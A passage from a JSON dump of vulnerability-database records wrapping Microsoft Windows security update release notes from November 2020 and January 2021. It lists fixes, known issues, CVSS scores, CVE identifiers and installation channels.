get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4598285>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4598285](<https://download.microsoft.com/download/c/a/7/ca7841e4-9adc-45ad-9379-c9cb50f3dd0e/4598285.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mskb", "title": "January 12, 2021\u2014KB4598285 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1665"], "modified": "2021-01-12T08:00:00", "id": "KB4598285", "href": "https://support.microsoft.com/en-us/help/4598285", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:06:21", "description": "None\n**IMPORTANT** Adobe Flash Player went out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4592468](<https://support.microsoft.com/help/4592468>) (released previous December 8, 2020) and addresses the following issues:\n\n * Addresses a security bypass vulnerability that exists in the way the Printer Remote Procedure Call (RPC) binding handles authentication for the remote Winspool interface. For more information, see [KB4599464](<https://support.microsoft.com/help/4599464>).\n * Addresses a security vulnerability issue with HTTPS-based intranet servers. After you install this update, HTTPS-based intranet servers cannot leverage a user proxy to detect updates by default. Scans that use these servers will fail if the clients do not have a configured system proxy. \n \nIf you must leverage a user proxy, you must configure the behavior by using the Windows Update policy **Allow user proxy to be used as a fallback if detection using system proxy fails**. To make sure that the highest levels of security, additionally leverage Windows Server Update Services (WSUS) Transport Layer Security (TLS) certificate pinning on all devices. For more information, see [Changes to scans, improved security for Windows devices](<https://aka.ms/WSUS-scans-part2>). \n \n**Note** This change does not affect customers who use HTTP WSUS servers.\n * Addresses an issue in which a principal in a trusted Managed Identity for Application (MIT) realm does not obtain a Kerberos Service ticket from Active Directory domain controllers (DCs). This issue occurs after Windows Updates that contains [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 are installed and **PerfromTicketSignature** is configured to **1** or higher. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the **USER_NO_AUTH_DATA_REQUIRED** flag.\n * Security updates to Windows App Platform and Frameworks, Windows Graphics, Windows Media, Windows Fundamentals, Windows Cryptography, Windows Virtualization, and Windows Hybrid Storage Services.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4598278>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4598278](<https://download.microsoft.com/download/2/c/c/2cc78328-eccd-4783-9752-db07d15856f6/4598278.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mskb", "title": "January 12, 2021\u2014KB4598278 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1665"], "modified": "2021-01-12T08:00:00", "id": "KB4598278", "href": "https://support.microsoft.com/en-us/help/4598278", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:06:21", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**NEW 11/10/20** \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4592471](<https://support.microsoft.com/help/4592471>) (released December 8, 2020) and addresses the following issues:\n\n * Addresses a security bypass vulnerability that exists in the way the Printer Remote Procedure Call (RPC) binding handles authentication for the remote Winspool interface. For more information, see [KB4599464](<https://support.microsoft.com/help/4599464>).\n * Addresses a security vulnerability issue with HTTPS-based intranet servers. After you install this update, HTTPS-based intranet servers cannot leverage a user proxy to detect updates by default. Scans that use these servers will fail if the clients do not have a configured system proxy. \n \nIf you must leverage a user proxy, you must configure the behavior by using the Windows Update policy **Allow user proxy to be used as a fallback if detection using system proxy fails**. To make sure that the highest levels of security, additionally leverage Windows Server Update Services (WSUS) Transport Layer Security (TLS) certificate pinning on all devices. For more information, see [Changes to scans, improved security for Windows devices](<https://aka.ms/WSUS-scans-part2>). \n \n**Note** This change does not affect customers who use HTTP WSUS servers.\n * Addresses an issue in which a principal in a trusted Managed Identity for Application (MIT) realm does not obtain a Kerberos Service ticket from Active Directory domain controllers (DCs). This issue occurs after Windows Updates that contains [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 are installed and **PerfromTicketSignature** is configured to **1** or higher. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the **USER_NO_AUTH_DATA_REQUIRED** flag.\n * Security updates to Windows App Platform and Frameworks, Windows Graphics, Windows Media, Windows Fundamentals, Windows Cryptography, Windows Virtualization, and Windows Hybrid Storage Services.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege. \n * Perform the operation from a node that doesn\u2019t have CSV ownership. \nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the _latest_ SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4598279>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4598279](<https://download.microsoft.com/download/d/e/f/defaf295-b1d8-43af-98ac-a3a9ddf08b8e/4598279.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mskb", "title": "January 12, 2021\u2014KB4598279 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1701"], "modified": "2021-01-12T08:00:00", "id": "KB4598279", "href": "https://support.microsoft.com/en-us/help/4598279", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:05:43", "description": "None\n**NEW 11/10/20 \nIMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2020. There will be a monthly security release (known as a \u201cB\u201d release) for December 2020. Normal monthly servicing for both B and C releases will resume in January 2021.\n\n**UPDATED 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article. To view other notes and messages, see the Windows 10, version 2004 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve security when using Microsoft Office products.\n * Updates to improve security when Windows performs basic operations.\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 2004\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 19041.1128) released November 10, 2020. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue in the future, make sure your applications or services run as a specific user or service account.\n * Security updates to the Microsoft Scripting Engine, Windows Input and Composition, Microsoft Graphics Component, the Windows Wallet Service, Windows Fundamentals, and the Windows Kernel.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nUsers of the Microsoft Input Method Editor (IME) for Japanese or Chinese languages might experience issues when attempting various tasks. You might have issues with input, receive unexpected results, or might not be able to enter text.| All IME issues listed in KB4564002 were resolved in KB4586853. \nSystem and user certificates might be lost when updating a device from Windows 10, version 1809 or later to a later version of Windows 10. Devices will only be impacted if they have already installed any Latest cumulative update (LCU) released September 16, 2020 or later and then proceed to update to a later version of Windows 10 from media or an installation source which does not have an LCU released October 13, 2020 or later integrated. This primarily happens when managed devices are updated using outdated bundles or media through an update management tool such as Windows Server Update Services (WSUS) or Microsoft Endpoint Configuration Manager. This might also happen when using outdated physical media or ISO images that do not have the latest updates integrated.**Note **Devices using Windows Update for Business or that connect directly to Windows Update are not impacted. Any device connecting to Windows Update should always receive the latest versions of the feature update, including the latest LCU, without any extra steps.| This issue is resolved in KB4592438. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the Windows release health page for [Windows Server, version 20H2](<https://docs.microsoft.com/windows/release-information/status-windows-10-20h2#1522msgdesc>) or [Windows Server, version 2004](<https://docs.microsoft.com/windows/release-information/status-windows-10-2004#1522msgdesc>) . **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594440. \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note** The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4586864) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586781>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4586781](<https://download.microsoft.com/download/9/0/c/90c20c3f-2cae-4cbb-93ab-ef00942e46d2/4586781.csv>). **Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586781 (OS Builds 19041.630 and 19042.630)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17052"], "modified": "2020-11-10T08:00:00", "id": "KB4586781", "href": "https://support.microsoft.com/en-us/help/4586781", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:05:51", "description": "None\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\n**NEW 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4580382](<https://support.microsoft.com/help/4580382>) (released October 13, 2020) and addresses the following issues:\n\n * Corrects the DST start date for the Fiji Islands to December 20, 2020.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue going forward, make sure your applications or services run as a specific user or service account.\n * Security updates to Windows Graphics, Windows Silicon Platform, Windows Authentication, Windows Core Networking, Windows Peripherals, Windows Network Security and Containers, Windows Hybrid Storage Services, and Windows Remote Desktop.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-server-2012#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594438. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586834>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4586834](<https://download.microsoft.com/download/3/7/5/37555c0d-b338-4516-8c2d-e3cab16c2829/4586834.csv>). \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586834 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17052"], "modified": "2020-11-10T08:00:00", "id": "KB4586834", "href": "https://support.microsoft.com/en-us/help/4586834", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:05:51", "description": "None\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\n**NEW 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4580347](<https://support.microsoft.com/help/4580347>) (released October 13, 2020) and addresses the following issues:\n\n * Corrects the DST start date for the Fiji Islands to December 20, 2020.\n * Allows administrators to enable \"Save target as\" through Group Policy for users in Microsoft Edge IE mode.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue going forward, make sure your applications or services run as a specific user or service account.\n * Security updates to Windows Graphics, Windows Silicon Platform, Windows Authentication, Windows Core Networking, Windows Peripherals, Windows Network Security and Containers, Windows Hybrid Storage Services, Windows Remote Desktop, and Microsoft Scripting Engine.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how 